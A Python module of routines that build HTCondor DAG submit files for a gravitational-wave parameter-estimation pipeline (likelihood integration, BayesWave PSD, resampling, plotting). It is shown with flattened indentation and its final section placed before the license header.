ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_step0(tag='PSD_BW', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo " + ifo)
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
ile_job.add_opt(ifo+"-timeslide", str(0.0))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_resample_sub(tag='resample', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("util_ResampleILEOutputWithExtrinsic.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt('fname',file_input)
ile_job.add_opt('fname-out',file_output)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_cat_sub(tag='cat', exe=None, file_prefix=None,file_postfix=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("find") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
exe_switch = which("switcheroo") # tool for patterend search-replace, to fix first line of output file
cmdname = 'catjob.sh'
with open(cmdname,'w') as f:
f.write("#! /bin/bash\n")
f.write(exe+" . -name '"+file_prefix+"*"+file_postfix+"' -exec cat {} \; | sort -r | uniq > "+file_output+";\n")
f.write(exe_switch + " 'm1 ' '# m1 ' "+file_output) # add standard prefix
os.system("chmod a+x "+cmdname)
ile_job = pipeline.CondorDAGJob(universe=universe, executable='catjob.sh')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# ile_job.add_arg(" . -name '" + file_prefix + "*" +file_postfix+"' -exec cat {} \; ")
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convertpsd_sub(tag='convert_psd', exe=None, ifo=None,file_input=None,target_dir=None,arg_str='',log_dir=None, universe='local',**kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("convert_psd_ascii2xml") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_opt("fname-psd-ascii",file_input)
ile_job.add_opt("ifo",ifo)
ile_job.add_arg("--conventional-postfix")
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if not (target_dir is None):
# Copy output PSD into place
ile_job.add_condor_cmd("+PostCmd", '" cp '+ifo+'-psd.xml.gz ' + target_dir +'"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_joingrids_sub(tag='join_grids', exe=None, universe='vanilla', input_pattern=None,target_dir=None,output_base=None,log_dir=None,n_explode=1, gzip="/usr/bin/gzip", old_add=True, **kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("ligolw_add") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# exe_here = "my_join.sh"
# with open(exe_here,'w') as f:
# f.write("#! /bin/bash \n")
# f.write(r"""
# #!/bin/bash
# # Modules and scripts run directly from repository
# # Note the repo and branch are self-referential ! Not a robust solution long-term
# # Exit on failure:
# # set -e
# {} {} > {}/{}.xml
# gzip {}.{}.xml""".format(exe,input_pattern,target_dir,output_base,target_dir,output_base) )
# os.system("chmod a+x "+exe_here)
# exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
fname_out =target_dir + "/" +output_base + ".xml.gz"
ile_job.add_arg("--output="+fname_out)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
explode_str = ""
for indx in np.arange(n_explode):
explode_str+= " {}/{}-{}.xml.gz ".format(working_dir,output_base,indx)
explode_str += " {}/{}.xml.gz ".format(working_dir,output_base)
ile_job.add_arg(explode_str)
# ile_job.add_arg("overlap-grid*.xml.gz") # working in our current directory
if old_add:
ile_job.add_opt("ilwdchar-compat",'') # needed?
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_subdagILE_sub(tag='subdag_ile', exe=None, universe='vanilla', submit_file=None,input_pattern=None,target_dir=None,output_suffix=None,log_dir=None,sim_xml=None, **kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("create_ile_sub_dag.py")
subfile = submit_file or 'ILE.sub'
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_arg("--target-dir "+target_dir)
ile_job.add_arg("--output-suffix "+output_suffix)
ile_job.add_arg("--submit-script "+subfile)
ile_job.add_arg("--macroiteration $(macroiteration)")
ile_job.add_arg("--sim-xml "+sim_xml)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
| 40.149694
| 465
| 0.665526
|
# Copyright (C) 2013 Evan Ochsner
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
A collection of routines to manage Condor workflows (DAGs).
"""
import os, sys
import numpy as np
from time import time
from hashlib import md5
from glue import pipeline
__author__ = "Evan Ochsner <[email protected]>, Chris Pankow <[email protected]>"
# Taken from
# http://pythonadventures.wordpress.com/2011/03/13/equivalent-of-the-which-command-in-python/
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
def which(program):
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file): return exe_file
return None
def mkdir(dir_name):
try :
os.mkdir(dir_name)
except OSError:
pass
def generate_job_id():
"""
Generate a unique md5 hash for use as a job ID.
Borrowed and modified from the LAL code in glue/glue/pipeline.py
"""
t = str( int( time() * 1000 ) )
r = str( int( np.random.random() * 100000000000000000 ) )
return md5(t + r).hexdigest()
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
def write_integrate_likelihood_extrinsic_grid_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Like the other case (below), but modified to use the sim_xml
and loop over 'event'
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'sim' is the path to the XML file with the grid
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("event")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
# FIXME: Keep in sync with arguments of integrate_likelihood_extrinsic
def write_integrate_likelihood_extrinsic_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'coinc' is the path to a coincident XML file, from which masses and
times will be drawn FIXME: remove this once it's no longer needed.
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("mass1")
ile_job.add_var_opt("mass2")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
return ile_job, ile_sub_name
def write_result_coalescence_sub(tag='coalesce', exe=None, log_dir=None, output_dir="./", use_default_cache=True):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("ligolw_sqlite")
sql_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
sql_sub_name = tag + '.sub'
sql_job.set_sub_file(sql_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
sql_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
sql_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
sql_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if use_default_cache:
sql_job.add_opt("input-cache", "ILE_$(macromassid).cache")
else:
sql_job.add_arg("$(macrofiles)")
#sql_job.add_arg("*$(macromassid)*.xml.gz")
sql_job.add_opt("database", "ILE_$(macromassid).sqlite")
#if os.environ.has_key("TMPDIR"):
#tmpdir = os.environ["TMPDIR"]
#else:
#print >>sys.stderr, "WARNING, TMPDIR environment variable not set. Will default to /tmp/, but this could be dangerous."
#tmpdir = "/tmp/"
tmpdir = "/dev/shm/"
sql_job.add_opt("tmp-space", tmpdir)
sql_job.add_opt("verbose", None)
sql_job.add_condor_cmd('getenv', 'True')
sql_job.add_condor_cmd('request_memory', '1024')
return sql_job, sql_sub_name
def write_posterior_plot_sub(tag='plot_post', exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("plot_like_contours")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("show-points", None)
plot_job.add_opt("dimension1", "mchirp")
plot_job.add_opt("dimension2", "eta")
plot_job.add_opt("input-cache", "ILE_all.cache")
plot_job.add_opt("log-evidence", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '1024')
return plot_job, plot_sub_name
def write_tri_plot_sub(tag='plot_tri', injection_file=None, exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("make_triplot")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("output", "ILE_triplot_$(macromassid).png")
if injection_file is not None:
plot_job.add_opt("injection", injection_file)
plot_job.add_arg("ILE_$(macromassid).sqlite")
plot_job.add_condor_cmd('getenv', 'True')
#plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_1dpos_plot_sub(tag='1d_post_plot', exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("postprocess_1d_cumulative")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("save-sampler-file", "ILE_$(macromassid).sqlite")
plot_job.add_opt("disable-triplot", None)
plot_job.add_opt("disable-1d-density", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_CIP_sub(tag='integrate', exe=None, input_net='all.net',output='output-ILE-samples',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=8192,arg_vals=None, no_grid=False,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ConstructIntrinsicPosterior_GenericCoordinates.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("fname", input_net)
ile_job.add_opt("fname-output-samples", out_dir+"/"+output)
ile_job.add_opt("fname-output-integral", out_dir+"/"+output)
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "fname_output_samples" in kwargs and kwargs["fname_output_samples"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_samples"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
if "fname_output_integral" in kwargs and kwargs["fname_output_integral"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_integral"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
def write_puff_sub(tag='puffball', exe=None, input_net='output-ILE-samples',output='puffball',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=1024,arg_vals=None, no_grid=False,**kwargs):
"""
Perform puffball calculation
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ParameterPuffball.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("inj-file", input_net)
ile_job.add_opt("inj-file-out", output)
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
